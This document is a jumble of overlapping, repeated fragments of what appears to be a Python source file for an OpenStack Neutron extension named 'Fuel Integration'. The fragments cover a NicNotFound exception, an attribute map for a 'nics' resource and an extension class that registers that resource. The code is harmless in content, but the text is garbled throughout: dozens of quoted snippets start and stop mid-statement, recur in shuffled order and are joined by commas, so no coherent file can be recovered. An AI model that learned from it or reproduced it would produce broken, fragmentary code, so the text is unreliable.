neutron.quota import resource_registry class NicNotFound(nexception.NotFound): message =", "key[:-1]) for key in RESOURCE_ATTRIBUTE_MAP.keys()] attr.PLURALS.update(dict(my_plurals)) exts = [] plugin = manager.NeutronManager.get_service_plugins()['FUEL'] for", "} class Fuel(ExtensionDescriptor): @classmethod def get_name(self): return 'Fuel Integration' @classmethod def get_alias(self): return", "exceptions as nexception from neutron import manager from neutron.quota import resource_registry class NicNotFound(nexception.NotFound):", "None } }, 'offloading_modes': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '',", "exts = [] plugin = manager.NeutronManager.get_service_plugins()['FUEL'] for resource_name in ['nic']: collection_name = resource_name.replace('_',", "import exceptions as nexception from neutron import manager from neutron.quota import resource_registry class", "from neutron import manager from neutron.quota import resource_registry class NicNotFound(nexception.NotFound): message = _(\"Nic", "True, 'default': '', 'validate': { 'type:string': None } }, 'driver': { 'allow_post': True,", "'default': '', 'validate': { 'type:string': None } } } } class Fuel(ExtensionDescriptor): @classmethod", "'validate': { 'type:string': None } }, 'driver': { 'allow_post': True, 'allow_put': True, 'is_visible':", "neutron import manager from neutron.quota import resource_registry class NicNotFound(nexception.NotFound): message = _(\"Nic %(nic_id)s", "None } }, 'pxe': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '',", "} } } } class Fuel(ExtensionDescriptor): @classmethod def get_name(self): return 'Fuel Integration' @classmethod", "'is_visible': True }, 'name': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '',", "'nics' RESOURCE_ATTRIBUTE_MAP = { NICS: { 'id': { 'allow_post': False, 'allow_put': False, 'validate':", "'pxe': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:boolean':", "}, 'if_type': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': {", "'bus_info': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:string':", "True, 'is_visible': True, 'default': '', 'validate': { 'type:string': attr.NAME_MAX_LEN } }, 'mac': {", "'is_visible': True, 'default': '', 'validate': { 'type:non_negative': None } }, 'max_speed': { 'allow_post':", "}, 'mac': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': {", "'validate': {'type:string': attr.TENANT_ID_MAX_LEN}, 'is_visible': True }, 'name': { 'allow_post': True, 'allow_put': True, 'is_visible':", "as nexception from neutron import manager from neutron.quota import resource_registry class NicNotFound(nexception.NotFound): message", "Fuel' @classmethod def get_updated(self): return '2016-03-15T09:00:00-08:00' @classmethod def get_resources(cls): \"\"\"Returns Ext Resources.\"\"\" my_plurals", "[(key, key[:-1]) for key in RESOURCE_ATTRIBUTE_MAP.keys()] attr.PLURALS.update(dict(my_plurals)) exts = [] plugin = manager.NeutronManager.get_service_plugins()['FUEL']", "plugin = manager.NeutronManager.get_service_plugins()['FUEL'] for resource_name in ['nic']: collection_name = resource_name.replace('_', '-') + \"s\"", "Ext Resources.\"\"\" my_plurals = [(key, key[:-1]) for key in RESOURCE_ATTRIBUTE_MAP.keys()] attr.PLURALS.update(dict(my_plurals)) exts =", "'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:string': attr.NAME_MAX_LEN } }, 'mac':", "'type:string': None } }, 'pxe': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default':", "'allow_put': False, 'required_by_policy': True, 'validate': {'type:string': attr.TENANT_ID_MAX_LEN}, 'is_visible': True }, 'name': { 'allow_post':", "'', 'validate': { 'type:string': None } } } } class Fuel(ExtensionDescriptor): @classmethod def", "None } } } } class Fuel(ExtensionDescriptor): @classmethod def get_name(self): return 'Fuel Integration'", "['nic']: collection_name = resource_name.replace('_', '-') + \"s\" params = RESOURCE_ATTRIBUTE_MAP.get(resource_name + \"s\", dict())", "in RESOURCE_ATTRIBUTE_MAP.keys()] attr.PLURALS.update(dict(my_plurals)) exts = [] plugin = manager.NeutronManager.get_service_plugins()['FUEL'] for resource_name in ['nic']:", "RESOURCE_ATTRIBUTE_MAP.keys()] attr.PLURALS.update(dict(my_plurals)) exts = [] plugin = manager.NeutronManager.get_service_plugins()['FUEL'] for resource_name in ['nic']: collection_name", "'Fuel Integration' @classmethod def get_alias(self): return 'fuel' @classmethod def get_description(self): return 'Integrates Neutron", "None } }, 'interface_properties': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '',", "from neutron.common import exceptions as nexception from neutron import manager from neutron.quota import", "{ 'allow_post': False, 'allow_put': False, 'validate': {'type:uuid': None}, 'is_visible': True, 'primary_key': True },", "True, 'is_visible': True, 'default': '', 'validate': { 'type:string': None } } } }", "@classmethod def get_alias(self): return 'fuel' @classmethod def get_description(self): return 'Integrates Neutron with Fuel'", "NICS = 'nics' RESOURCE_ATTRIBUTE_MAP = { NICS: { 'id': { 'allow_post': False, 'allow_put':", "'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:non_negative': None }", "_(\"Nic %(nic_id)s could not be found.\") NICS = 'nics' RESOURCE_ATTRIBUTE_MAP = { NICS:", "'is_visible': True, 'default': '', 'validate': { 'type:string': None } }, 'current_speed': { 'allow_post':", "'type:non_negative': None } }, 'driver': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default':", "'', 'validate': { 'type:string': None } }, 'interface_properties': { 'allow_post': True, 'allow_put': True,", "'fuel' @classmethod def get_description(self): return 'Integrates Neutron with Fuel' @classmethod def get_updated(self): return", "{ 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:string': attr.NAME_MAX_LEN", "'max_speed': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:non_negative':", "get_name(self): return 'Fuel Integration' @classmethod def get_alias(self): return 'fuel' @classmethod def get_description(self): return", "RESOURCE_ATTRIBUTE_MAP.get(resource_name + \"s\", dict()) resource_registry.register_resource_by_name(resource_name) controller = base.create_resource(collection_name, resource_name, plugin, params, allow_bulk=True, allow_pagination=True,", "'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:string': None } }, 'current_speed':", "'is_visible': True, 'default': '', 'validate': { 'type:boolean': None } }, 'offloading_modes': { 'allow_post':", "'', 'validate': { 'type:string': None } }, 'current_speed': { 'allow_post': True, 'allow_put': True,", "None}, 'is_visible': True, 'primary_key': True }, 'tenant_id': { 'allow_post': True, 'allow_put': False, 'required_by_policy':", "'allow_post': True, 'allow_put': False, 'required_by_policy': True, 'validate': {'type:string': attr.TENANT_ID_MAX_LEN}, 'is_visible': True }, 'name':", "'if_type': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:string':", "+ \"s\", dict()) resource_registry.register_resource_by_name(resource_name) controller = base.create_resource(collection_name, resource_name, plugin, params, allow_bulk=True, allow_pagination=True, allow_sorting=True)", "}, 'pxe': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': {", "'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:string': None } }, 'interface_properties':", "} }, 'bus_info': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate':", "@classmethod def get_updated(self): return '2016-03-15T09:00:00-08:00' @classmethod def get_resources(cls): \"\"\"Returns Ext Resources.\"\"\" my_plurals =", "True, 'default': '', 'validate': { 'type:string': None } }, 'bus_info': { 'allow_post': True,", "controller, path_prefix='fuel', attr_map=params) exts.append(ex) return exts def update_attributes_map(self, attributes): super(Fuel, self).update_attributes_map( attributes, extension_attrs_map=RESOURCE_ATTRIBUTE_MAP)", "= RESOURCE_ATTRIBUTE_MAP.get(resource_name + \"s\", dict()) resource_registry.register_resource_by_name(resource_name) controller = base.create_resource(collection_name, resource_name, plugin, params, allow_bulk=True,", "'', 'validate': { 'type:string': None } }, 'driver': { 'allow_post': True, 'allow_put': True,", "True, 'default': '', 'validate': { 'type:macaddress': None } }, 'if_type': { 'allow_post': True,", "ExtensionDescriptor from neutron.api import extensions from neutron.api.v2 import attributes as attr from neutron.api.v2", "resource_name in ['nic']: collection_name = resource_name.replace('_', '-') + \"s\" params = RESOURCE_ATTRIBUTE_MAP.get(resource_name +", "}, 'bus_info': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': {", "{'type:uuid': None}, 'is_visible': True, 'primary_key': True }, 'tenant_id': { 'allow_post': True, 'allow_put': False,", "@classmethod def get_resources(cls): \"\"\"Returns Ext Resources.\"\"\" my_plurals = [(key, key[:-1]) for key in", "= _(\"Nic %(nic_id)s could not be found.\") NICS = 'nics' RESOURCE_ATTRIBUTE_MAP = {", "'is_visible': True, 'default': '', 'validate': { 'type:macaddress': None } }, 'if_type': { 'allow_post':", "'default': '', 'validate': { 'type:string': None } }, 'driver': { 'allow_post': True, 'allow_put':", "'is_visible': True, 'default': '', 'validate': { 'type:string': None } } } } class", "True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:string': attr.NAME_MAX_LEN } },", "{ 'type:macaddress': None } }, 'if_type': { 'allow_post': True, 'allow_put': True, 'is_visible': True,", "'', 'validate': { 'type:non_negative': None } }, 'max_speed': { 'allow_post': True, 'allow_put': True,", "False, 'validate': {'type:uuid': None}, 'is_visible': True, 'primary_key': True }, 'tenant_id': { 'allow_post': True,", "from neutron.quota import resource_registry class NicNotFound(nexception.NotFound): message = _(\"Nic %(nic_id)s could not be", "'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:string': attr.NAME_MAX_LEN }", "'validate': {'type:uuid': None}, 'is_visible': True, 'primary_key': True }, 'tenant_id': { 'allow_post': True, 'allow_put':", "neutron.api.extensions import ExtensionDescriptor from neutron.api import extensions from neutron.api.v2 import attributes as attr", "{ 'id': { 'allow_post': False, 'allow_put': False, 'validate': {'type:uuid': None}, 'is_visible': True, 'primary_key':", "from neutron.api import extensions from neutron.api.v2 import attributes as attr from neutron.api.v2 import", "= 'nics' RESOURCE_ATTRIBUTE_MAP = { NICS: { 'id': { 'allow_post': False, 'allow_put': False,", "'primary_key': True }, 'tenant_id': { 'allow_post': True, 'allow_put': False, 'required_by_policy': True, 'validate': {'type:string':", "True, 'default': '', 'validate': { 'type:string': None } } } } class Fuel(ExtensionDescriptor):", "'', 'validate': { 'type:string': None } }, 'pxe': { 'allow_post': True, 'allow_put': True,", "True }, 'name': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate':", "manager from neutron.quota import resource_registry class NicNotFound(nexception.NotFound): message = _(\"Nic %(nic_id)s could not", "'type:macaddress': None } }, 'if_type': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default':", "True, 'is_visible': True, 'default': '', 'validate': { 'type:string': None } }, 'driver': {", "class NicNotFound(nexception.NotFound): message = _(\"Nic %(nic_id)s could not be found.\") NICS = 'nics'", "'type:string': None } }, 'bus_info': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default':", "with Fuel' @classmethod def get_updated(self): return '2016-03-15T09:00:00-08:00' @classmethod def get_resources(cls): \"\"\"Returns Ext Resources.\"\"\"", "NicNotFound(nexception.NotFound): message = _(\"Nic %(nic_id)s could not be found.\") NICS = 'nics' RESOURCE_ATTRIBUTE_MAP", "for resource_name in ['nic']: collection_name = resource_name.replace('_', '-') + \"s\" params = RESOURCE_ATTRIBUTE_MAP.get(resource_name", "could not be found.\") NICS = 'nics' RESOURCE_ATTRIBUTE_MAP = { NICS: { 'id':", "'driver': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:string':", "params = RESOURCE_ATTRIBUTE_MAP.get(resource_name + \"s\", dict()) resource_registry.register_resource_by_name(resource_name) controller = base.create_resource(collection_name, resource_name, plugin, params,", "[] plugin = manager.NeutronManager.get_service_plugins()['FUEL'] for resource_name in ['nic']: collection_name = resource_name.replace('_', '-') +", "'validate': { 'type:macaddress': None } }, 'if_type': { 'allow_post': True, 'allow_put': True, 'is_visible':", "'is_visible': True, 'default': '', 'validate': { 'type:string': None } }, 'driver': { 'allow_post':", "'is_visible': True, 'default': '', 'validate': { 'type:string': None } }, 'interface_properties': { 'allow_post':", "'validate': { 'type:non_negative': None } }, 'max_speed': { 'allow_post': True, 'allow_put': True, 'is_visible':", "True, 'is_visible': True, 'default': '', 'validate': { 'type:string': None } }, 'current_speed': {", "extensions.ResourceExtension(collection_name, controller, path_prefix='fuel', attr_map=params) exts.append(ex) return exts def update_attributes_map(self, attributes): super(Fuel, self).update_attributes_map( attributes,", "from neutron.api.v2 import base from neutron.common import exceptions as nexception from neutron import", "'is_visible': True, 'default': '', 'validate': { 'type:non_negative': None } }, 'driver': { 'allow_post':", "'is_visible': True, 'default': '', 'validate': { 'type:string': attr.NAME_MAX_LEN } }, 'mac': { 'allow_post':", "{ 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:boolean': None", "'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:string': None }", "import manager from neutron.quota import resource_registry class NicNotFound(nexception.NotFound): message = _(\"Nic %(nic_id)s could", "{ 'type:boolean': None } }, 'offloading_modes': { 'allow_post': True, 'allow_put': True, 'is_visible': True,", "'default': '', 'validate': { 'type:string': attr.NAME_MAX_LEN } }, 'mac': { 'allow_post': True, 'allow_put':", "be found.\") NICS = 'nics' RESOURCE_ATTRIBUTE_MAP = { NICS: { 'id': { 'allow_post':", "in ['nic']: collection_name = resource_name.replace('_', '-') + \"s\" params = RESOURCE_ATTRIBUTE_MAP.get(resource_name + \"s\",", "Neutron with Fuel' @classmethod def get_updated(self): return '2016-03-15T09:00:00-08:00' @classmethod def get_resources(cls): \"\"\"Returns Ext", "%(nic_id)s could not be found.\") NICS = 'nics' RESOURCE_ATTRIBUTE_MAP = { NICS: {", "'interface_properties': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:string':", "True, 'default': '', 'validate': { 'type:string': None } }, 'interface_properties': { 'allow_post': True,", "allow_bulk=True, allow_pagination=True, allow_sorting=True) ex = extensions.ResourceExtension(collection_name, controller, path_prefix='fuel', attr_map=params) exts.append(ex) return exts def", "'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:string': None } }, 'pxe':", "return '2016-03-15T09:00:00-08:00' @classmethod def get_resources(cls): \"\"\"Returns Ext Resources.\"\"\" my_plurals = [(key, key[:-1]) for", "True, 'validate': {'type:string': attr.TENANT_ID_MAX_LEN}, 'is_visible': True }, 'name': { 'allow_post': True, 'allow_put': True,", "'name': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:string':", "@classmethod def get_description(self): return 'Integrates Neutron with Fuel' @classmethod def get_updated(self): return '2016-03-15T09:00:00-08:00'", "+ \"s\" params = RESOURCE_ATTRIBUTE_MAP.get(resource_name + \"s\", dict()) resource_registry.register_resource_by_name(resource_name) controller = base.create_resource(collection_name, resource_name,", "'offloading_modes': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:string':", "'default': '', 'validate': { 'type:string': None } }, 'pxe': { 'allow_post': True, 'allow_put':", "'type:non_negative': None } }, 'max_speed': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default':", "{ 'type:string': None } } } } class Fuel(ExtensionDescriptor): @classmethod def get_name(self): return", "'validate': { 'type:string': attr.NAME_MAX_LEN } }, 'mac': { 'allow_post': True, 'allow_put': True, 'is_visible':", "'validate': { 'type:boolean': None } }, 'offloading_modes': { 'allow_post': True, 'allow_put': True, 'is_visible':", "'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:boolean': None }", "} } } class Fuel(ExtensionDescriptor): @classmethod def get_name(self): return 'Fuel Integration' @classmethod def", "base.create_resource(collection_name, resource_name, plugin, params, allow_bulk=True, allow_pagination=True, allow_sorting=True) ex = extensions.ResourceExtension(collection_name, controller, path_prefix='fuel', attr_map=params)", "attr from neutron.api.v2 import base from neutron.common import exceptions as nexception from neutron", "{ 'type:string': None } }, 'driver': { 'allow_post': True, 'allow_put': True, 'is_visible': True,", "'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:string': None } }, 'driver':", "found.\") NICS = 'nics' RESOURCE_ATTRIBUTE_MAP = { NICS: { 'id': { 'allow_post': False,", "'default': '', 'validate': { 'type:non_negative': None } }, 'max_speed': { 'allow_post': True, 'allow_put':", "return 'Fuel Integration' @classmethod def get_alias(self): return 'fuel' @classmethod def get_description(self): return 'Integrates", "True, 'is_visible': True, 'default': '', 'validate': { 'type:string': None } }, 'bus_info': {", "attributes as attr from neutron.api.v2 import base from neutron.common import exceptions as nexception", "}, 'tenant_id': { 'allow_post': True, 'allow_put': False, 'required_by_policy': True, 'validate': {'type:string': attr.TENANT_ID_MAX_LEN}, 'is_visible':", "}, 'name': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': {", "True, 'primary_key': True }, 'tenant_id': { 'allow_post': True, 'allow_put': False, 'required_by_policy': True, 'validate':", "neutron.api.v2 import base from neutron.common import exceptions as nexception from neutron import manager", "} }, 'if_type': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate':", "'Integrates Neutron with Fuel' @classmethod def get_updated(self): return '2016-03-15T09:00:00-08:00' @classmethod def get_resources(cls): \"\"\"Returns", "True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:string': None } },", "'type:string': None } } } } class Fuel(ExtensionDescriptor): @classmethod def get_name(self): return 'Fuel", "True, 'is_visible': True, 'default': '', 'validate': { 'type:string': None } }, 'pxe': {", "import attributes as attr from neutron.api.v2 import base from neutron.common import exceptions as", "def get_description(self): return 'Integrates Neutron with Fuel' @classmethod def get_updated(self): return '2016-03-15T09:00:00-08:00' @classmethod", "'default': '', 'validate': { 'type:non_negative': None } }, 'driver': { 'allow_post': True, 'allow_put':", "'', 'validate': { 'type:string': attr.NAME_MAX_LEN } }, 'mac': { 'allow_post': True, 'allow_put': True,", "} } class Fuel(ExtensionDescriptor): @classmethod def get_name(self): return 'Fuel Integration' @classmethod def get_alias(self):", "True, 'default': '', 'validate': { 'type:string': None } }, 'pxe': { 'allow_post': True,", "True, 'allow_put': False, 'required_by_policy': True, 'validate': {'type:string': attr.TENANT_ID_MAX_LEN}, 'is_visible': True }, 'name': {", "'', 'validate': { 'type:non_negative': None } }, 'driver': { 'allow_post': True, 'allow_put': True,", "key in RESOURCE_ATTRIBUTE_MAP.keys()] attr.PLURALS.update(dict(my_plurals)) exts = [] plugin = manager.NeutronManager.get_service_plugins()['FUEL'] for resource_name in", "'', 'validate': { 'type:macaddress': None } }, 'if_type': { 'allow_post': True, 'allow_put': True,", "}, 'offloading_modes': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': {", "= extensions.ResourceExtension(collection_name, controller, path_prefix='fuel', attr_map=params) exts.append(ex) return exts def update_attributes_map(self, attributes): super(Fuel, self).update_attributes_map(", "True, 'is_visible': True, 'default': '', 'validate': { 'type:macaddress': None } }, 'if_type': {", "{ 'type:non_negative': None } }, 'max_speed': { 'allow_post': True, 'allow_put': True, 'is_visible': True,", "True, 'is_visible': True, 'default': '', 'validate': { 'type:boolean': None } }, 'offloading_modes': {", "params, allow_bulk=True, allow_pagination=True, allow_sorting=True) ex = extensions.ResourceExtension(collection_name, controller, path_prefix='fuel', attr_map=params) exts.append(ex) return exts", "True, 'is_visible': True, 'default': '', 'validate': { 'type:non_negative': None } }, 'driver': {", "{ 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:non_negative': None", "} }, 'interface_properties': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate':", "True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:macaddress': None } },", "resource_registry class NicNotFound(nexception.NotFound): message = _(\"Nic %(nic_id)s could not be found.\") NICS =", "} }, 'mac': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate':", "allow_sorting=True) ex = extensions.ResourceExtension(collection_name, controller, path_prefix='fuel', attr_map=params) exts.append(ex) return exts def update_attributes_map(self, attributes):", "'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:string': None } }, 'bus_info':", "{ 'allow_post': True, 'allow_put': False, 'required_by_policy': True, 'validate': {'type:string': attr.TENANT_ID_MAX_LEN}, 'is_visible': True },", "{ 'type:string': attr.NAME_MAX_LEN } }, 'mac': { 'allow_post': True, 'allow_put': True, 'is_visible': True,", "controller = base.create_resource(collection_name, resource_name, plugin, params, allow_bulk=True, allow_pagination=True, allow_sorting=True) ex = extensions.ResourceExtension(collection_name, controller,", "resource_name.replace('_', '-') + \"s\" params = RESOURCE_ATTRIBUTE_MAP.get(resource_name + \"s\", dict()) resource_registry.register_resource_by_name(resource_name) controller =", "}, 'current_speed': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': {", "def get_resources(cls): \"\"\"Returns Ext Resources.\"\"\" my_plurals = [(key, key[:-1]) for key in RESOURCE_ATTRIBUTE_MAP.keys()]", "get_alias(self): return 'fuel' @classmethod def get_description(self): return 'Integrates Neutron with Fuel' @classmethod def", "Fuel(ExtensionDescriptor): @classmethod def get_name(self): return 'Fuel Integration' @classmethod def get_alias(self): return 'fuel' @classmethod", "}, 'max_speed': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': {", "RESOURCE_ATTRIBUTE_MAP = { NICS: { 'id': { 'allow_post': False, 'allow_put': False, 'validate': {'type:uuid':", "{ 'type:string': None } }, 'bus_info': { 'allow_post': True, 'allow_put': True, 'is_visible': True,", "{ NICS: { 'id': { 'allow_post': False, 'allow_put': False, 'validate': {'type:uuid': None}, 'is_visible':", "{'type:string': attr.TENANT_ID_MAX_LEN}, 'is_visible': True }, 'name': { 'allow_post': True, 'allow_put': True, 'is_visible': True,", "} }, 'pxe': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate':", "NICS: { 'id': { 'allow_post': False, 'allow_put': False, 'validate': {'type:uuid': None}, 'is_visible': True,", "\"s\", dict()) resource_registry.register_resource_by_name(resource_name) controller = base.create_resource(collection_name, resource_name, plugin, params, allow_bulk=True, allow_pagination=True, allow_sorting=True) ex", "'allow_put': False, 'validate': {'type:uuid': None}, 'is_visible': True, 'primary_key': True }, 'tenant_id': { 'allow_post':", "False, 'required_by_policy': True, 'validate': {'type:string': attr.TENANT_ID_MAX_LEN}, 'is_visible': True }, 'name': { 'allow_post': True,", "} }, 'current_speed': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate':", "'mac': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:macaddress':", "message = _(\"Nic %(nic_id)s could not be found.\") NICS = 'nics' RESOURCE_ATTRIBUTE_MAP =", "{ 'type:non_negative': None } }, 'driver': { 'allow_post': True, 'allow_put': True, 'is_visible': True,", "Resources.\"\"\" my_plurals = [(key, key[:-1]) for key in RESOURCE_ATTRIBUTE_MAP.keys()] attr.PLURALS.update(dict(my_plurals)) exts = []", "from neutron.api.v2 import attributes as attr from neutron.api.v2 import base from neutron.common import", "'is_visible': True, 'default': '', 'validate': { 'type:string': None } }, 'bus_info': { 'allow_post':", "= { NICS: { 'id': { 'allow_post': False, 'allow_put': False, 'validate': {'type:uuid': None},", "'required_by_policy': True, 'validate': {'type:string': attr.TENANT_ID_MAX_LEN}, 'is_visible': True }, 'name': { 'allow_post': True, 'allow_put':", "True, 'default': '', 'validate': { 'type:boolean': None } }, 'offloading_modes': { 'allow_post': True,", "{ 'type:string': None } }, 'interface_properties': { 'allow_post': True, 'allow_put': True, 'is_visible': True,", "True, 'default': '', 'validate': { 'type:non_negative': None } }, 'driver': { 'allow_post': True,", "not be found.\") NICS = 'nics' RESOURCE_ATTRIBUTE_MAP = { NICS: { 'id': {", "ex = extensions.ResourceExtension(collection_name, controller, path_prefix='fuel', attr_map=params) exts.append(ex) return exts def update_attributes_map(self, attributes): super(Fuel,", "'', 'validate': { 'type:string': None } }, 'bus_info': { 'allow_post': True, 'allow_put': True,", "} }, 'max_speed': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate':", "get_description(self): return 'Integrates Neutron with Fuel' @classmethod def get_updated(self): return '2016-03-15T09:00:00-08:00' @classmethod def", "for key in RESOURCE_ATTRIBUTE_MAP.keys()] attr.PLURALS.update(dict(my_plurals)) exts = [] plugin = manager.NeutronManager.get_service_plugins()['FUEL'] for resource_name", "{ 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:string': None", "'default': '', 'validate': { 'type:macaddress': None } }, 'if_type': { 'allow_post': True, 'allow_put':", "neutron.api import extensions from neutron.api.v2 import attributes as attr from neutron.api.v2 import base", "'type:string': attr.NAME_MAX_LEN } }, 'mac': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default':", "True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:non_negative': None } },", "\"s\" params = RESOURCE_ATTRIBUTE_MAP.get(resource_name + \"s\", dict()) resource_registry.register_resource_by_name(resource_name) controller = base.create_resource(collection_name, resource_name, plugin,", "False, 'allow_put': False, 'validate': {'type:uuid': None}, 'is_visible': True, 'primary_key': True }, 'tenant_id': {", "'validate': { 'type:string': None } } } } class Fuel(ExtensionDescriptor): @classmethod def get_name(self):", "'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:non_negative': None } }, 'driver':", "= [(key, key[:-1]) for key in RESOURCE_ATTRIBUTE_MAP.keys()] attr.PLURALS.update(dict(my_plurals)) exts = [] plugin =", "dict()) resource_registry.register_resource_by_name(resource_name) controller = base.create_resource(collection_name, resource_name, plugin, params, allow_bulk=True, allow_pagination=True, allow_sorting=True) ex =", "from neutron.api.extensions import ExtensionDescriptor from neutron.api import extensions from neutron.api.v2 import attributes as", "{ 'type:string': None } }, 'current_speed': { 'allow_post': True, 'allow_put': True, 'is_visible': True,", "'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:non_negative': None } }, 'max_speed':", "'validate': { 'type:string': None } }, 'interface_properties': { 'allow_post': True, 'allow_put': True, 'is_visible':", "} }, 'driver': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate':", "{ 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:macaddress': None", "@classmethod def get_name(self): return 'Fuel Integration' @classmethod def get_alias(self): return 'fuel' @classmethod def", "= base.create_resource(collection_name, resource_name, plugin, params, allow_bulk=True, allow_pagination=True, allow_sorting=True) ex = extensions.ResourceExtension(collection_name, controller, path_prefix='fuel',", "'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:macaddress': None }", "'default': '', 'validate': { 'type:string': None } }, 'current_speed': { 'allow_post': True, 'allow_put':", "get_resources(cls): \"\"\"Returns Ext Resources.\"\"\" my_plurals = [(key, key[:-1]) for key in RESOURCE_ATTRIBUTE_MAP.keys()] attr.PLURALS.update(dict(my_plurals))", "resource_registry.register_resource_by_name(resource_name) controller = base.create_resource(collection_name, resource_name, plugin, params, allow_bulk=True, allow_pagination=True, allow_sorting=True) ex = extensions.ResourceExtension(collection_name,", "} }, 'offloading_modes': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate':", "manager.NeutronManager.get_service_plugins()['FUEL'] for resource_name in ['nic']: collection_name = resource_name.replace('_', '-') + \"s\" params =", "return 'fuel' @classmethod def get_description(self): return 'Integrates Neutron with Fuel' @classmethod def get_updated(self):", "def get_name(self): return 'Fuel Integration' @classmethod def get_alias(self): return 'fuel' @classmethod def get_description(self):", "'default': '', 'validate': { 'type:string': None } }, 'bus_info': { 'allow_post': True, 'allow_put':", "True }, 'tenant_id': { 'allow_post': True, 'allow_put': False, 'required_by_policy': True, 'validate': {'type:string': attr.TENANT_ID_MAX_LEN},", "'is_visible': True, 'primary_key': True }, 'tenant_id': { 'allow_post': True, 'allow_put': False, 'required_by_policy': True,", "True, 'default': '', 'validate': { 'type:non_negative': None } }, 'max_speed': { 'allow_post': True,", "'validate': { 'type:string': None } }, 'bus_info': { 'allow_post': True, 'allow_put': True, 'is_visible':", "Integration' @classmethod def get_alias(self): return 'fuel' @classmethod def get_description(self): return 'Integrates Neutron with", "{ 'type:string': None } }, 'pxe': { 'allow_post': True, 'allow_put': True, 'is_visible': True,", "= manager.NeutronManager.get_service_plugins()['FUEL'] for resource_name in ['nic']: collection_name = resource_name.replace('_', '-') + \"s\" params", "}, 'driver': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': {", "True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:string': None } }", "\"\"\"Returns Ext Resources.\"\"\" my_plurals = [(key, key[:-1]) for key in RESOURCE_ATTRIBUTE_MAP.keys()] attr.PLURALS.update(dict(my_plurals)) exts", "'type:string': None } }, 'current_speed': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default':", "True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:boolean': None } },", "True, 'default': '', 'validate': { 'type:string': attr.NAME_MAX_LEN } }, 'mac': { 'allow_post': True,", "'type:string': None } }, 'interface_properties': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default':", "True, 'default': '', 'validate': { 'type:string': None } }, 'current_speed': { 'allow_post': True,", "return 'Integrates Neutron with Fuel' @classmethod def get_updated(self): return '2016-03-15T09:00:00-08:00' @classmethod def get_resources(cls):", "'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:macaddress': None } }, 'if_type':", "allow_pagination=True, allow_sorting=True) ex = extensions.ResourceExtension(collection_name, controller, path_prefix='fuel', attr_map=params) 